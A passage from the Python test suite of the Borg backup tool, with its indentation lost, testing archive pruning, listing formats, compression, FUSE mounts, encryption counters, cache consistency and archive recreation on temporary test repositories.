# self.assert_in('"--old" has been deprecated. Use "--new" instead', output)
def test_prune_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
self.cmd('create', self.repository_location + '::test2', src_dir)
# these are not really a checkpoints, but they look like some:
self.cmd('create', self.repository_location + '::test3.checkpoint', src_dir)
self.cmd('create', self.repository_location + '::test3.checkpoint.1', src_dir)
self.cmd('create', self.repository_location + '::test4.checkpoint', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2')
assert re.search(r'Would prune:\s+test1', output)
# must keep the latest non-checkpoint archive:
assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
# must keep the latest checkpoint archive:
assert re.search(r'Keeping checkpoint archive:\s+test4.checkpoint', output)
output = self.cmd('list', self.repository_location)
self.assert_in('test1', output)
self.assert_in('test2', output)
self.assert_in('test3.checkpoint', output)
self.assert_in('test3.checkpoint.1', output)
self.assert_in('test4.checkpoint', output)
self.cmd('prune', self.repository_location, '--keep-daily=2')
output = self.cmd('list', self.repository_location)
self.assert_not_in('test1', output)
# the latest non-checkpoint archive must be still there:
self.assert_in('test2', output)
# only the latest checkpoint archive must still be there:
self.assert_not_in('test3.checkpoint', output)
self.assert_not_in('test3.checkpoint.1', output)
self.assert_in('test4.checkpoint', output)
# now we supercede the latest checkpoint by a successful backup:
self.cmd('create', self.repository_location + '::test5', src_dir)
self.cmd('prune', self.repository_location, '--keep-daily=2')
output = self.cmd('list', self.repository_location)
# all checkpoints should be gone now:
self.assert_not_in('checkpoint', output)
# the latest archive must be still there
self.assert_in('test5', output)
def test_prune_repository_save_space(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
self.cmd('create', self.repository_location + '::test2', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
assert re.search(r'Would prune:\s+test1', output)
output = self.cmd('list', self.repository_location)
self.assert_in('test1', output)
self.assert_in('test2', output)
self.cmd('prune', '--save-space', self.repository_location, '--keep-daily=2')
output = self.cmd('list', self.repository_location)
self.assert_not_in('test1', output)
self.assert_in('test2', output)
def test_prune_repository_prefix(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::foo-2015-08-12-10:00', src_dir)
self.cmd('create', self.repository_location + '::foo-2015-08-12-20:00', src_dir)
self.cmd('create', self.repository_location + '::bar-2015-08-12-10:00', src_dir)
self.cmd('create', self.repository_location + '::bar-2015-08-12-20:00', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2', '--prefix=foo-')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+foo-2015-08-12-20:00', output)
assert re.search(r'Would prune:\s+foo-2015-08-12-10:00', output)
output = self.cmd('list', self.repository_location)
self.assert_in('foo-2015-08-12-10:00', output)
self.assert_in('foo-2015-08-12-20:00', output)
self.assert_in('bar-2015-08-12-10:00', output)
self.assert_in('bar-2015-08-12-20:00', output)
self.cmd('prune', self.repository_location, '--keep-daily=2', '--prefix=foo-')
output = self.cmd('list', self.repository_location)
self.assert_not_in('foo-2015-08-12-10:00', output)
self.assert_in('foo-2015-08-12-20:00', output)
self.assert_in('bar-2015-08-12-10:00', output)
self.assert_in('bar-2015-08-12-20:00', output)
def test_prune_repository_glob(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::2015-08-12-10:00-foo', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-20:00-foo', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-10:00-bar', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-20:00-bar', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2', '--glob-archives=2015-*-foo')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+2015-08-12-20:00-foo', output)
assert re.search(r'Would prune:\s+2015-08-12-10:00-foo', output)
output = self.cmd('list', self.repository_location)
self.assert_in('2015-08-12-10:00-foo', output)
self.assert_in('2015-08-12-20:00-foo', output)
self.assert_in('2015-08-12-10:00-bar', output)
self.assert_in('2015-08-12-20:00-bar', output)
self.cmd('prune', self.repository_location, '--keep-daily=2', '--glob-archives=2015-*-foo')
output = self.cmd('list', self.repository_location)
self.assert_not_in('2015-08-12-10:00-foo', output)
self.assert_in('2015-08-12-20:00-foo', output)
self.assert_in('2015-08-12-10:00-bar', output)
self.assert_in('2015-08-12-20:00-bar', output)
def test_list_prefix(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test-1', src_dir)
self.cmd('create', self.repository_location + '::something-else-than-test-1', src_dir)
self.cmd('create', self.repository_location + '::test-2', src_dir)
output = self.cmd('list', '--prefix=test-', self.repository_location)
self.assert_in('test-1', output)
self.assert_in('test-2', output)
self.assert_not_in('something-else', output)
def test_list_format(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, src_dir)
output_1 = self.cmd('list', test_archive)
output_2 = self.cmd('list', '--format', '{mode} {user:6} {group:6} {size:8d} {mtime} {path}{extra}{NEWLINE}', test_archive)
output_3 = self.cmd('list', '--format', '{mtime:%s} {path}{NL}', test_archive)
self.assertEqual(output_1, output_2)
self.assertNotEqual(output_1, output_3)
def test_list_repository_format(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--comment', 'comment 1', self.repository_location + '::test-1', src_dir)
self.cmd('create', '--comment', 'comment 2', self.repository_location + '::test-2', src_dir)
output_1 = self.cmd('list', self.repository_location)
output_2 = self.cmd('list', '--format', '{archive:<36} {time} [{id}]{NL}', self.repository_location)
self.assertEqual(output_1, output_2)
output_1 = self.cmd('list', '--short', self.repository_location)
self.assertEqual(output_1, 'test-1\ntest-2\n')
output_1 = self.cmd('list', '--format', '{barchive}/', self.repository_location)
self.assertEqual(output_1, 'test-1/test-2/')
output_3 = self.cmd('list', '--format', '{name} {comment}{NL}', self.repository_location)
self.assert_in('test-1 comment 1\n', output_3)
self.assert_in('test-2 comment 2\n', output_3)
def test_list_hash(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('amb', contents=b'a' * 1000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{sha256} {path}{NL}', test_archive)
assert "cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0 input/amb" in output
assert "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 input/empty_file" in output
def test_list_chunk_counts(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('two_chunks')
with open(os.path.join(self.input_path, 'two_chunks'), 'wb') as fd:
fd.write(b'abba' * 2000000)
fd.write(b'baab' * 2000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{num_chunks} {unique_chunks} {path}{NL}', test_archive)
assert "0 0 input/empty_file" in output
assert "2 2 input/two_chunks" in output
def test_list_size(self):
self.create_regular_file('compressible_file', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', '-C', 'lz4', test_archive, 'input')
output = self.cmd('list', '--format', '{size} {csize} {dsize} {dcsize} {path}{NL}', test_archive)
size, csize, dsize, dcsize, path = output.split("\n")[1].split(" ")
assert int(csize) < int(size)
assert int(dcsize) < int(dsize)
assert int(dsize) <= int(size)
assert int(dcsize) <= int(csize)
def test_list_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list_repo = json.loads(self.cmd('list', '--json', self.repository_location))
repository = list_repo['repository']
assert len(repository['id']) == 64
assert datetime.strptime(repository['last_modified'], ISO_FORMAT) # must not raise
assert list_repo['encryption']['mode'] == 'repokey'
assert 'keyfile' not in list_repo['encryption']
archive0 = list_repo['archives'][0]
assert datetime.strptime(archive0['time'], ISO_FORMAT) # must not raise
list_archive = self.cmd('list', '--json-lines', self.repository_location + '::test')
items = [json.loads(s) for s in list_archive.splitlines()]
assert len(items) == 2
file1 = items[1]
assert file1['path'] == 'input/file1'
assert file1['size'] == 81920
assert datetime.strptime(file1['mtime'], ISO_FORMAT) # must not raise
list_archive = self.cmd('list', '--json-lines', '--format={sha256}', self.repository_location + '::test')
items = [json.loads(s) for s in list_archive.splitlines()]
assert len(items) == 2
file1 = items[1]
assert file1['path'] == 'input/file1'
assert file1['sha256'] == 'b2915eb69f260d8d3c25249195f2c8f4f716ea82ec760ae929732c0262442b2b'
def test_list_json_args(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('list', '--json-lines', self.repository_location, exit_code=2)
self.cmd('list', '--json', self.repository_location + '::archive', exit_code=2)
def test_log_json(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
log = self.cmd('create', '--log-json', self.repository_location + '::test', 'input', '--list', '--debug')
messages = {} # type -> message, one of each kind
for line in log.splitlines():
msg = json.loads(line)
messages[msg['type']] = msg
file_status = messages['file_status']
assert 'status' in file_status
assert file_status['path'].startswith('input')
log_message = messages['log_message']
assert isinstance(log_message['time'], float)
assert log_message['levelname'] == 'DEBUG' # there should only be DEBUG messages
assert isinstance(log_message['message'], str)
def test_debug_profile(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', '--debug-profile=create.prof')
self.cmd('debug', 'convert-profile', 'create.prof', 'create.pyprof')
stats = pstats.Stats('create.pyprof')
stats.strip_dirs()
stats.sort_stats('cumtime')
self.cmd('create', self.repository_location + '::test2', 'input', '--debug-profile=create.pyprof')
stats = pstats.Stats('create.pyprof') # Only do this on trusted data!
stats.strip_dirs()
stats.sort_stats('cumtime')
def test_common_options(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
log = self.cmd('--debug', 'create', self.repository_location + '::test', 'input')
assert 'security: read previous location' in log
def _get_sizes(self, compression, compressible, size=10000):
if compressible:
contents = b'X' * size
else:
contents = os.urandom(size)
self.create_regular_file('file', contents=contents)
self.cmd('init', '--encryption=none', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '-C', compression, archive, 'input')
output = self.cmd('list', '--format', '{size} {csize} {path}{NL}', archive)
size, csize, path = output.split("\n")[1].split(" ")
return int(size), int(csize)
def test_compression_none_compressible(self):
size, csize = self._get_sizes('none', compressible=True)
assert csize >= size
assert csize == size + 3
def test_compression_none_uncompressible(self):
size, csize = self._get_sizes('none', compressible=False)
assert csize >= size
assert csize == size + 3
def test_compression_zlib_compressible(self):
size, csize = self._get_sizes('zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35
def test_compression_zlib_uncompressible(self):
size, csize = self._get_sizes('zlib', compressible=False)
assert csize >= size
def test_compression_auto_compressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35 # same as compression 'zlib'
def test_compression_auto_uncompressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=False)
assert csize >= size
assert csize == size + 3 # same as compression 'none'
def test_compression_lz4_compressible(self):
size, csize = self._get_sizes('lz4', compressible=True)
assert csize < size * 0.1
def test_compression_lz4_uncompressible(self):
size, csize = self._get_sizes('lz4', compressible=False)
assert csize >= size
def test_compression_lzma_compressible(self):
size, csize = self._get_sizes('lzma', compressible=True)
assert csize < size * 0.1
def test_compression_lzma_uncompressible(self):
size, csize = self._get_sizes('lzma', compressible=False)
assert csize >= size
def test_change_passphrase(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
os.environ['BORG_NEW_PASSPHRASE'] = 'newpassphrase'
# here we have both BORG_PASSPHRASE and BORG_NEW_PASSPHRASE set:
self.cmd('key', 'change-passphrase', self.repository_location)
os.environ['BORG_PASSPHRASE'] = 'newpassphrase'
self.cmd('list', self.repository_location)
def test_break_lock(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('break-lock', self.repository_location)
def test_usage(self):
self.cmd()
self.cmd('-h')
def test_help(self):
assert 'Borg' in self.cmd('help')
assert 'patterns' in self.cmd('help', 'patterns')
assert 'Initialize' in self.cmd('help', 'init')
assert 'positional arguments' not in self.cmd('help', 'init', '--epilog-only')
assert 'This command initializes' not in self.cmd('help', 'init', '--usage-only')
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse(self):
def has_noatime(some_file):
atime_before = os.stat(some_file).st_atime_ns
try:
os.close(os.open(some_file, flags_noatime))
except PermissionError:
return False
else:
atime_after = os.stat(some_file).st_atime_ns
noatime_used = flags_noatime != flags_normal
return noatime_used and atime_before == atime_after
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_test_files()
have_noatime = has_noatime('input/file1')
self.cmd('create', '--exclude-nodump', self.repository_location + '::archive', 'input')
self.cmd('create', '--exclude-nodump', self.repository_location + '::archive2', 'input')
if has_lchflags:
# remove the file we did not backup, so input and output become equal
os.remove(os.path.join('input', 'flagfile'))
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# mount the whole repository, archive contents shall show up in archivename subdirs of mountpoint:
with self.fuse_mount(self.repository_location, mountpoint):
# bsdflags are not supported by the FUSE mount
# we also ignore xattrs here, they are tested separately
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive', 'input'),
ignore_bsdflags=True, ignore_xattrs=True)
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive2', 'input'),
ignore_bsdflags=True, ignore_xattrs=True)
# mount only 1 archive, its contents shall show up directly in mountpoint:
with self.fuse_mount(self.repository_location + '::archive', mountpoint):
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'input'),
ignore_bsdflags=True, ignore_xattrs=True)
# regular file
in_fn = 'input/file1'
out_fn = os.path.join(mountpoint, 'input', 'file1')
# stat
sti1 = os.stat(in_fn)
sto1 = os.stat(out_fn)
assert sti1.st_mode == sto1.st_mode
assert sti1.st_uid == sto1.st_uid
assert sti1.st_gid == sto1.st_gid
assert sti1.st_size == sto1.st_size
if have_noatime:
assert sti1.st_atime == sto1.st_atime
assert sti1.st_ctime == sto1.st_ctime
assert sti1.st_mtime == sto1.st_mtime
# note: there is another hardlink to this, see below
assert sti1.st_nlink == sto1.st_nlink == 2
# read
with open(in_fn, 'rb') as in_f, open(out_fn, 'rb') as out_f:
assert in_f.read() == out_f.read()
# hardlink (to 'input/file1')
if are_hardlinks_supported():
in_fn = 'input/hardlink'
out_fn = os.path.join(mountpoint, 'input', 'hardlink')
sti2 = os.stat(in_fn)
sto2 = os.stat(out_fn)
assert sti2.st_nlink == sto2.st_nlink == 2
assert sto1.st_ino == sto2.st_ino
# symlink
if are_symlinks_supported():
in_fn = 'input/link1'
out_fn = os.path.join(mountpoint, 'input', 'link1')
sti = os.stat(in_fn, follow_symlinks=False)
sto = os.stat(out_fn, follow_symlinks=False)
assert sti.st_size == len('somewhere')
assert sto.st_size == len('somewhere')
assert stat.S_ISLNK(sti.st_mode)
assert stat.S_ISLNK(sto.st_mode)
assert os.readlink(in_fn) == os.readlink(out_fn)
# FIFO
if are_fifos_supported():
out_fn = os.path.join(mountpoint, 'input', 'fifo1')
sto = os.stat(out_fn)
assert stat.S_ISFIFO(sto.st_mode)
# list/read xattrs
try:
in_fn = 'input/fusexattr'
out_fn = os.fsencode(os.path.join(mountpoint, 'input', 'fusexattr'))
if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
assert sorted(no_selinux(xattr.listxattr(out_fn))) == [b'user.empty', b'user.foo', ]
assert xattr.getxattr(out_fn, b'user.foo') == b'bar'
assert xattr.getxattr(out_fn, b'user.empty') == b''
else:
assert xattr.listxattr(out_fn) == []
try:
xattr.getxattr(out_fn, b'user.foo')
except OSError as e:
assert e.errno == llfuse.ENOATTR
else:
assert False, "expected OSError(ENOATTR), but no error was raised"
except OSError as err:
if sys.platform.startswith(('nothing_here_now', )) and err.errno == errno.ENOTSUP:
# some systems have no xattr support on FUSE
pass
else:
raise
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse_versions_view(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('test', contents=b'first')
if are_hardlinks_supported():
self.create_regular_file('hardlink1', contents=b'123456')
os.link('input/hardlink1', 'input/hardlink2')
os.link('input/hardlink1', 'input/hardlink3')
self.cmd('create', self.repository_location + '::archive1', 'input')
self.create_regular_file('test', contents=b'second')
self.cmd('create', self.repository_location + '::archive2', 'input')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# mount the whole repository, archive contents shall show up in versioned view:
with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions'):
path = os.path.join(mountpoint, 'input', 'test') # filename shows up as directory ...
files = os.listdir(path)
assert all(f.startswith('test.') for f in files) # ... with files test.xxxxx in there
assert {b'first', b'second'} == {open(os.path.join(path, f), 'rb').read() for f in files}
if are_hardlinks_supported():
hl1 = os.path.join(mountpoint, 'input', 'hardlink1', 'hardlink1.00001')
hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
assert os.stat(hl1).st_ino == os.stat(hl2).st_ino == os.stat(hl3).st_ino
assert open(hl3, 'rb').read() == b'123456'
# similar again, but exclude the hardlink master:
with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions', '-e', 'input/hardlink1'):
if are_hardlinks_supported():
hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
assert os.stat(hl2).st_ino == os.stat(hl3).st_ino
assert open(hl3, 'rb').read() == b'123456'
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse_allow_damaged_files(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive')
# Get rid of a chunk and repair it
archive, repository = self.open_archive('archive')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
repository.delete(item.chunks[-1].id)
path = item.path # store full path for later
break
else:
assert False # missed the file
repository.commit(compact=False)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
with self.fuse_mount(self.repository_location + '::archive', mountpoint):
with pytest.raises(OSError) as excinfo:
open(os.path.join(mountpoint, path))
assert excinfo.value.errno == errno.EIO
with self.fuse_mount(self.repository_location + '::archive', mountpoint, '-o', 'allow_damaged_files'):
open(os.path.join(mountpoint, path)).close()
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse_mount_options(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('arch11')
self.create_src_archive('arch12')
self.create_src_archive('arch21')
self.create_src_archive('arch22')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
with self.fuse_mount(self.repository_location, mountpoint, '--first=2', '--sort=name'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
with self.fuse_mount(self.repository_location, mountpoint, '--last=2', '--sort=name'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch1'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch2'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12', 'arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=nope'):
assert sorted(os.listdir(os.path.join(mountpoint))) == []
def verify_aes_counter_uniqueness(self, method):
seen = set() # Chunks already seen
used = set() # counter values already used
def verify_uniqueness():
with Repository(self.repository_path) as repository:
for id, _ in repository.open_index(repository.get_transaction_id()).iteritems():
data = repository.get(id)
hash = sha256(data).digest()
if hash not in seen:
seen.add(hash)
num_blocks = num_cipher_blocks(len(data) - 41)
nonce = bytes_to_long(data[33:41])
for counter in range(nonce, nonce + num_blocks):
self.assert_not_in(counter, used)
used.add(counter)
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=' + method, self.repository_location)
verify_uniqueness()
self.cmd('create', self.repository_location + '::test', 'input')
verify_uniqueness()
self.cmd('create', self.repository_location + '::test.2', 'input')
verify_uniqueness()
self.cmd('delete', self.repository_location + '::test.2')
verify_uniqueness()
def test_aes_counter_uniqueness_keyfile(self):
self.verify_aes_counter_uniqueness('keyfile')
def test_aes_counter_uniqueness_passphrase(self):
self.verify_aes_counter_uniqueness('repokey')
def test_debug_dump_archive_items(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('debug', 'dump-archive-items', self.repository_location + '::test')
output_dir = sorted(os.listdir('output'))
assert len(output_dir) > 0 and output_dir[0].startswith('000000_')
assert 'Done.' in output
def test_debug_dump_repo_objs(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('debug', 'dump-repo-objs', self.repository_location)
output_dir = sorted(os.listdir('output'))
assert len(output_dir) > 0 and output_dir[0].startswith('00000000_')
assert 'Done.' in output
def test_debug_put_get_delete_obj(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
data = b'some data'
hexkey = sha256(data).hexdigest()
self.create_regular_file('file', contents=data)
output = self.cmd('debug', 'put-obj', self.repository_location, 'input/file')
assert hexkey in output
output = self.cmd('debug', 'get-obj', self.repository_location, hexkey, 'output/file')
assert hexkey in output
with open('output/file', 'rb') as f:
data_read = f.read()
assert data == data_read
output = self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
assert "deleted" in output
output = self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
assert "not found" in output
output = self.cmd('debug', 'delete-obj', self.repository_location, 'invalid')
assert "is invalid" in output
def test_init_interrupt(self):
def raise_eof(*args):
raise EOFError
with patch.object(KeyfileKeyBase, 'create', raise_eof):
self.cmd('init', '--encryption=repokey', self.repository_location, exit_code=1)
assert not os.path.exists(self.repository_location)
def test_init_requires_encryption_option(self):
self.cmd('init', self.repository_location, exit_code=2)
def test_init_nested_repositories(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
if self.FORK_DEFAULT:
self.cmd('init', '--encryption=repokey', self.repository_location + '/nested', exit_code=2)
else:
with pytest.raises(Repository.AlreadyExists):
self.cmd('init', '--encryption=repokey', self.repository_location + '/nested')
def check_cache(self):
# First run a regular borg check
self.cmd('check', self.repository_location)
# Then check that the cache on disk matches exactly what's in the repo.
with self.open_repository() as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest, sync=False) as cache:
original_chunks = cache.chunks
Cache.destroy(repository)
with Cache(repository, key, manifest) as cache:
correct_chunks = cache.chunks
assert original_chunks is not correct_chunks
seen = set()
for id, (refcount, size, csize) in correct_chunks.iteritems():
o_refcount, o_size, o_csize = original_chunks[id]
assert refcount == o_refcount
assert size == o_size
assert csize == o_csize
seen.add(id)
for id, (refcount, size, csize) in original_chunks.iteritems():
assert id in seen
def test_check_cache(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with self.open_repository() as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest, sync=False) as cache:
cache.begin_txn()
cache.chunks.incref(list(cache.chunks.iteritems())[0][0])
cache.commit()
with pytest.raises(AssertionError):
self.check_cache()
def test_recreate_target_rc(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('recreate', self.repository_location, '--target=asdf', exit_code=2)
assert 'Need to specify single archive' in output
def test_recreate_target(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.check_cache()
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.check_cache()
original_archive = self.cmd('list', self.repository_location)
self.cmd('recreate', archive, 'input/dir2', '-e', 'input/dir2/file3', '--target=new-archive')
self.check_cache()
archives = self.cmd('list', self.repository_location)
assert original_archive in archives
assert 'new-archive' in archives
archive = self.repository_location + '::new-archive'
listing = self.cmd('list', '--short', archive)
assert 'file1' not in listing
assert 'dir2/file2' in listing
assert 'dir2/file3' not in listing
def test_recreate_basic(self):
self.create_test_files()
self.create_regular_file('dir2/file3', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.cmd('recreate', archive, 'input/dir2', '-e', 'input/dir2/file3')
self.check_cache()
listing = self.cmd('list', '--short', archive)
assert 'file1' not in listing
assert 'dir2/file2' in listing
assert 'dir2/file3' not in listing
@pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_recreate_subtree_hardlinks(self):
# This is essentially the same problem set as in test_extract_hardlinks
self._extract_hardlinks_setup()
self.cmd('create', self.repository_location + '::test2', 'input')
self.cmd('recreate', self.repository_location + '::test', 'input/dir1')
self.check_cache()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
with changedir('output'):
self.cmd('extract', self.repository_location + '::test2')
assert os.stat('input/dir1/hardlink').st_nlink == 4
def test_recreate_rechunkify(self):
with open(os.path.join(self.input_path, 'large_file'), 'wb') as fd:
fd.write(b'a' * 280)
fd.write(b'b' * 280)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--chunker-params', '7,9,8,128', self.repository_location + '::test1', 'input')
self.cmd('create', self.repository_location + '::test2', 'input', '--files-cache=disabled')
list = self.cmd('list', self.repository_location + '::test1', 'input/large_file',
'--format', '{num_chunks} {unique_chunks}')
num_chunks, unique_chunks = map(int, list.split(' '))
# test1 and test2 do not deduplicate
assert num_chunks == unique_chunks
self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
self.check_cache()
# test1 and test2 do deduplicate after recreate
assert int(self.cmd('list', self.repository_location + '::test1', 'input/large_file', '--format={size}'))
assert not int(self.cmd('list', self.repository_location + '::test1', 'input/large_file',
'--format', '{unique_chunks}'))
def test_recreate_recompress(self):
self.create_regular_file('compressible', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', '-C', 'none')
file_list = self.cmd('list', self.repository_location + '::test', 'input/compressible',
'--format', '{size} {csize} {sha256}')
size, csize, sha256_before = file_list.split(' ')
assert int(csize) >= int(size) # >= due to metadata overhead
self.cmd('recreate', self.repository_location, '-C', 'lz4', '--recompress')
self.check_cache()
file_list = self.cmd('list', self.repository_location + '::test', 'input/compressible',
'--format', '{size} {csize} {sha256}')
size, csize, sha256_after = file_list.split(' ')
assert int(csize) < int(size)
assert sha256_before == sha256_after
def test_recreate_dry_run(self):
self.create_regular_file('compressible', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
archives_before = self.cmd('list', self.repository_location + '::test')
self.cmd('recreate', self.repository_location, '-n', '-e', 'input/compressible')
self.check_cache()
archives_after = self.cmd('list', self.repository_location + '::test')
assert archives_after == archives_before
def test_recreate_skips_nothing_to_do(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_before = self.cmd('info', self.repository_location + '::test')
self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
self.check_cache()
info_after = self.cmd('info', self.repository_location + '::test')
assert info_before == info_after # includes archive ID
def test_with_lock(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
lock_path = os.path.join(self.repository_path, 'lock.exclusive')
cmd = 'python3', '-c', 'import os, sys; sys.exit(42 if os.path.exists("%s") else 23)' % lock_path
self.cmd('with-lock', self.repository_location, *cmd, fork=True, exit_code=42)
def test_recreate_list_output(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=0)
self.create_regular_file('file2', size=0)
self.create_regular_file('file3', size=0)
self.create_regular_file('file4', size=0)
self.create_regular_file('file5', size=0)
self.cmd('create', self.repository_location + '::test', 'input')
output = self.cmd('recreate', '--list', '--info', self.repository_location + '::test', '-e', 'input/file2')
self.check_cache()
self.assert_in("input/file1", output)
self.assert_in("x input/file2", output)
output = self.cmd('recreate', '--list', self.repository_location + '::test', '-e', 'input/file3')
self.check_cache()
self.assert_in("input/file1", output)
self.assert_in("x input/file3", output)
output = self.cmd('recreate', self.repository_location + '::test', '-e', 'input/file4')
self.check_cache()
self.assert_not_in("input/file1", output)
self.assert_not_in("x input/file4", output)
output = self.cmd('recreate', '--info', self.repository_location + '::test', '-e', 'input/file5')
self.check_cache()
self.assert_not_in("input/file1", output)
self.assert_not_in("x input/file5", output)
def test_bad_filters(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('delete', '--first', '1', '--last', '1', self.repository_location, fork=True, exit_code=2)
def test_key_export_keyfile(self):
export_file = self.output_path + '/exported'
